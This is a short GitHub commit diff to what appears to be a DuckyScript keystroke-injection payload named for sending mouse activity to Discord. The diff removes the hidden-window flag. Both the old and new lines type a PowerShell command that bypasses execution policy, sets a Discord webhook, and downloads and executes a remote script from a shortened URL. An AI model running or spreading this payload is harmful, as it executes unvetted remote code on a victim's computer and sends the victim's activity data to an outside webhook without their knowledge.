Update Mouse-Activity-to-Discord.txt

This commit is contained in:
egieb
2025-06-20 10:57:31 +00:00
committed by GitHub
parent 26ed5157cb
commit 59a1593123

View File

@@ -15,7 +15,7 @@ REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -w h -NoP -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_mm_to_dc | iex
STRING powershell -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_mm_to_dc | iex
ENTER